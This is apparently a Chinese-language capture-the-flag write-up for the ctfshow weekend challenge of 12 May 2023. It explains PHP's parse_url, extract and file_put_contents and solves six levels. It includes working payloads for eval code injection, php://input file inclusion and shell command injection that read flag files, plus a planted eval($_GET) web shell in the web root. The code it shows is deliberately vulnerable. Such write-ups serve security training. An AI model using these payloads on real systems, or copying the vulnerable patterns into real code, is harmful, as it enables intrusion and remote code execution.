ctfshow周末大挑战2023/5/12

本周周末大挑战用到的函数讲解

parse_url()

作用：解析URL，返回其组成部分

语法：
parse_url ( string $url [, int $component = -1 ] )
参数：
url：要解析的 URL。无效字符将使用 _ 来替换。

component：
指定 PHP_URL_SCHEME、 PHP_URL_HOST、 PHP_URL_PORT、 PHP_URL_USER、 PHP_URL_PASS、 PHP_URL_PATH、PHP_URL_QUERY 或 PHP_URL_FRAGMENT 的其中一个来获取 URL 中指定的部分的 string。 （除了指定为PHP_URL_PORT 后，将返回一个 integer 的值）。

例如：

<?php
$url = 'http://user:pass@host/path?args=value#anch';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
?>
结果--------------------------------------------------------------------
Array
(
    [scheme] => http
    [host] => host
    [user] => user
    [pass] => pass
    [path] => /path
    [query] => args=value
    [fragment] => anch
)
	/path

extract()

extract() 函数从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。

该函数返回成功设置的变量数目。

语法：extract(array,extract_rules,prefix)

例如:

<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>
结果-------------------------------------------------------------------
$a = Cat; $b = Dog; $c = Horse

file_put_contents()

file_put_contents() 函数把一个字符串写入文件中。与依次调用 fopen()，fwrite() 以及 fclose() 功能一样。

语法：file_put_contents(file,data,mode,context)
参数：
file：必需。规定要写入数据的文件。如果文件不存在，则创建一个新文件。

data：可选。规定要写入文件的数据。可以是字符串、数组或数据流。

mode：可选。规定如何打开/写入文件。可能的值：
FILE_USE_INCLUDE_PATH
FILE_APPEND
LOCK_EX

context：可选。规定文件句柄的环境。context是一套可以修改流的行为的选项。若使用null，则忽略。

题目讲解及write up

第一关

题目源代码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$data = parse_url($_GET['u']);

eval($data['host']);

首先，我们分许源代码：GET传参u为url格式的字符串，该url的组成部分被赋给了data数组，然后将data数组中的host的值将他转化为php代码(eval()的作用，可以将字符串转换为php代码)。

OK我们的思路就是在url中host部分写成我们可以进行代码执行的恶意代码。
我们先写一个phpinfo();测试一下。

?u=http://phpinfo();

成功输出phpinfo。

接下来我们就开始进行代码执行。
我们会发现，我们直接使用system(‘ls /’);来查看根目录是不可行的，因为url中包含的有“/”这个斜杠符号，我们前面已经写过host内容，我们在写出“/”，那么斜杠后的“');”这些东西就会被认为是url 中 path 里的东西了，所以我们得换种思路。

新思路是：我们在源代码的基础上，再使用一次eval()函数进行代码执行，只不过这次我们将传参方式改为POST传参，因为parse_url函数只对GET传参起作用。

GET传参
?u=http://eval($_POST[w]);

POST传参
w=system('ls /');

找到flag直接cat读取。

GET传参
?u=http://eval($_POST[w]);

POST传参
w=system('cat /flag_is_here.txt');

成功拿到flag。

第二关

题目源代码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:25:53
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$data = parse_url($_GET['u']);

include $data['host'].$data['path'];

首先还是分析源代码：GET传参u为url格式的字符串，该url的组成部分被赋给了data数组，使用include函数将data数组中host的值与path的值拼接的结果进行文件包含。

首先我们要明白一点，文件包含，我们就得使用伪协议进行命令执行或者代码执行来找到flag文件在哪，然后才能读取。但是如果我们按照正常的url格式进行传参的话，就比如u=http://host/flag，那么我们的path是一定会带有“/”这个符号的。所以我们就得使用非正常方法。

这里有一个小tips：就是当我们输入?u=http:php://这个字符串的时候，
我们的path是“php://”这个字符串的，而且host是为空的。

所以我们就可以使用php://伪协议中的php://input来实现代码执行，进而执行命令。(由于我的hackbar的问题，我是在bp上进行的)

GET传参
?u=http:php://input

POST传参
<?php phpinfo();?>

可以看到成功的输出了phpinfo的内容。

接下来就是看在根目录中找到flag文件进行读取。

GET传参
?u=http:php://input

POST传参
<?php system('cat /_f1ag_1s_h3re.txt');?>

成功拿到flag。

第三关

题目源代码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$data = parse_url($_GET['u']);

include $data['scheme'].$data['path'];

首先还是分析源代码：GET传参u为url格式的字符串，该url的组成部分被赋给了data数组，使用include函数将data数组中scheme(协议名称)的值与path的值拼接的结果进行文件包含

本道题目跟上道题目的思路是一样的，还是利用php://伪协议进行文件包含，只不过host变成了scheme(协议名称)。

这里还是一个小tips：就是当我们输入?u=http:://123这个字符串的时候，
我们的path是“://123”这个字符串的，scheme是“http”，
他们俩拼接在一起就是“http://123”。
我们要使用php://input伪协议，只需将http改为php，将://123改为://input即可。

GET传参
?u==php:://input

POST传参
<?php phpinfo();?>

也是成功的输出了phpinfo的信息。

接下来就是在根目录找到flag进行读取了。

GET传参
?u==php:://input

POST传参
<?php system('cat /_f1a_g_1s_h3re');?>

成功拿到flag。

第四关

题目源代码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

$data = parse_url($_GET['u']);

system($data['host']);

首先我们还是先来分析一波代码，GET传参u为url格式的字符串，该url的组成部分被赋给了data数组，然后使用system()函数将data数组中host的值作为命令进行命令执行。

这里需要注意的是，我们不能直接使用“u=http://ls /”来作为payload，因为ls / 中的斜杠，会被parse_url函数当作path中的内容，这样我们还是在原来的目录中进行ls。

这时我们应该怎么办呢？
我们可以尝试先执行一个pwd，然后再重新执行cd …;pwd 试一下。

?u=http://pwd;cd ..;pwd

我们可以看到，我们使用cd切换目录之后，两次的pwd执行结果不同，代表我们切换目录成功，那么我们就可以使用cd …;cd …;cd …;一直切换到根目录，然后进行找寻flag进行读取了。

?u=http://cd ..;cd ..;cd ..;cat 1_f1ag_1s_h3re

成功拿到flag。

第五关

题目源代码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

extract(parse_url($_GET['u']));
include $$$$$$host;

本题目是个套娃问题，就是使用extract函数将GET传参url中的组成，host变为$host，其值为url中host的值，path、scheme、query等部分也是一样。

这时我们就可以通过参数指向(比如，再将host的值写为scheme，那么$host=scheme，$$host=$scheme=scheme的值)，来最终包含我们的php://input伪协议进行文件包含。

payload：

GET传参
?u=user://pass:fragment@scheme/?php://input%23query
注：%23是#的url编码，如果不写%23直接写#，#后的内容会被浏览器直接过滤掉。

POST传参
<?php phpinfo();?>

这样的话:
$host=scheme
$$host=$scheme=user
$$$host=$user=pass
$$$$host=$pass=fragment
$$$$$host=$fragment=query
$$$$$$host=$query=php://input

这样我们在进行post传参执行php代码，就可以使用php://input进行文件包含执行php代码了。

成功输出了phpinfo的信息，接下来就是在根目录中找flag文件进行读取。

payload：

GET传参
?u=user://pass:fragment@scheme/?php://input%23query
注：%23是#的url编码，如果不写%23直接写#，#后的内容会被浏览器直接过滤掉。

POST传参
<?php system('cat /_f1ag_1s_h3ree');?>

成功拿到flag。

第六关

题目源代码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

$data = parse_url($_GET['u']);

file_put_contents($data['path'], $data['host']);

首先还是分析源代码，GET传参u为url格式的字符串，该url的组成部分被赋给了data数组，然后使用file_put_contents()函数来将data数组中host的值作为内容写进data数组中path的值为文件名的文件中。

这里经过测试发现，host中?与php不能和<>紧挨着出现，那么传统的php文件内容形式是采取不了了。

我们就是用html文件中的< script language=‘php’>标签来实现php的代码。这里记住，只需写一个< script>，不需要写< /scirpt>，因为/还会被parse_url函数当作path中的内容。
由于正常的url中，path自带 / ，我们将path写成/var/www/html/a.php，这样我们的host中的内容就会被写到网站根目录中a.php中。

payload：

?u=http://<script language='php'>phpinfo();/var/www/html/a.php

$data['host']=<script language='php'>phpinfo();
$data['path']=/var/www/html/a.php

我们去访问a.php。

a.php显示出来phpinfo的信息，接下来我们将内容改为能够代码执行的php代码即可。

?u=http://<script language='php'>eval($_GET[w]);/var/www/html/a.php

然后去访问a.php。并且传参w=system(‘ls /’);即可列出根目录的内容。

a.php?w=system('ls /');

读取flag。

a.php?w=system('cat /_f1a_g_1s_h3re');

成功拿到flag。